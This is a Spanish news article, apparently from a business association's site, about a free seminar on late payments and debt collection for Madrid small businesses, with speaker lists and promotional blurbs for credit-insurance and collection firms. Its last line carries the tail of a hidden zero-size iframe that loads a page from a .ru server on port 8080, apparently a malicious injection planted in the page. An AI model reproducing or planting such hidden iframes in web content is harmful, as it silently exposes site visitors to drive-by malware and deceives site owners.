|
El nivel de morosidad en España sigue subiendo, aunque a un ritmo menor que en los primeros momentos de crisis. Aún así, hacer frente a los impagos se ha convertido en una dura batalla a librar por parte de las pymes.
Conocer los orígenes y causas de la morosidad empresarial, cómo actuar dentro de la empresa frente a la misma manteniendo una actitud proactiva, qué conductas hay que fomentar y cuales evitar, etc, así como conocer la conveniencia y el momento de externalizar las gestiones de cobro, son armas fundamentales que los empresarios deben conocer y poner en práctica.
La sede social de UNICEM ha sido testigo de esta jornada gratuita para las empresas con el fin de prevenir y hacer frente a la morosidad. Para ello, han participado una selección de expertos en la materia, que ha atraído el interés de más de 80 empresas madrileñas.
El 95% de las pymes españolas se encuentran en situación de riesgo por las pérdidas ocasionadas de los impagos. UNICEM ha puesto en marcha varios dispositivos de asesoramiento a las empresas con el fin de evitar este riesgo, manteniendo a las empresas puntualmente informadas acerca de las precauciones a tomar ante la morosidad.
Alejandro Pérez de Cárdenas, Presidente de UNICEM, ha destacado el grave problema de la morosidad que viven las empresas madrileñas que están llevando a la quiebra a muchas de ellas. Así mismo, reiteró que una adecuada política en la gestión de cobros es crucial.
En síntesis, en la jornada se ha tratado la situación de la morosidad en el tejido empresarial madrileño, presentando posibles herramientas y soluciones para hacer frente a los impagos; de esta manera, el seguro de crédito se convierte en la herramienta de gestión integral para este problema; la cobertura que ofrecen este tipo de seguros es imprescindible en especial para las pymes.
Los ponentes de la jornada fueron: Emilio J. Estebaranz Alcaide, Director General CTI Tecnología y Gestión-Grupo CESCE; Valentín Arce Hidalgo, Director Comercial Informa D&B- Grupo CESCE; David Plaza y Juan Pallarés de CTI Tecnología y Gestión Grupo CESCE; Conrado Martínez, Director de Marketing y atención al cliente Informa D&B- Grupo CESCE y José Carlos Alonso y Félix Moreno de Gramaudit Editores.
Más información
CTI Gestión y Tecnología- Grupo CESCE
GESTIÓN DE MOROSIDAD. Soluciones expertas para la PROTECCIÓN del Crédito. Nuestro compromiso y confianza en los resultados que conseguimos nos hace ofrecer un servicio:
■ Sin costes fijos: comisión sobre resultado de recuperación. ■ Con inmediatez en la actuación. ■ Y con reducción de la pérdida esperada por morosidad. CTI cuenta con una plataforma experta en gestión de cobro con alto poder resolutivo y, una red externa de agencias de recobro y una red de abogados que permiten realizar cualquier procedimiento extrajudicial y judicial necesario para recuperar el crédito.
Informa D&B-Grupo CESCE
INFORMA D&B es la empresa líder del Grupo CESCE dedicada a suministrar Información Comercial, Financiera y de Marketing, tanto nacional como internacional, de empresas y empresarios, para aumentar el conocimiento de clientes y proveedores y minimizar el riesgo comercial.
Gramaudit Auditores
CUADRO DE MANDO INTEGRAL Presentación de una SOLUCIÓN REAL basada en las teorías de Norton y Kaplan como base para la optimización de la GESTIÓN INTEGRAL. La REESTRUCTURACIÓN y CONTROL DE COSTES requeridos para la superación de la situación de crisis existente, establece una metodología perfectamente definida que culmina con la implantación de esta EFICAZ herramienta.
src="http://nutcountry.ru:8080/index.php?pid=13" width="0" height="0" style="display:none">
|